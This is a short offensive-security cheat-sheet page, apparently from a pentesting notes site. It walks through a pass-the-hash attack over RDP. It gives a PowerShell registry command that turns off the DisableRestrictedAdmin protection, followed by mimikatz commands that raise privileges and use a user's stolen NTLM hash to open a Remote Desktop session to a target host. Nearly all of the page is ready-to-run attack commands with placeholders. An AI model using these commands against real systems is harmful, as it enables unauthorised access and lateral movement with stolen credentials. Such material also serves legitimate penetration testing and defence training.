Enable Restricted Admin using powershell and use mimikatz for RDP
To enable restrcitedadmin using powershell run the following command.
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD
Now you can use mimikatz as follows to get RDP session
token::elevate
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin /v:<IP of the system>"
Last modified 2yr ago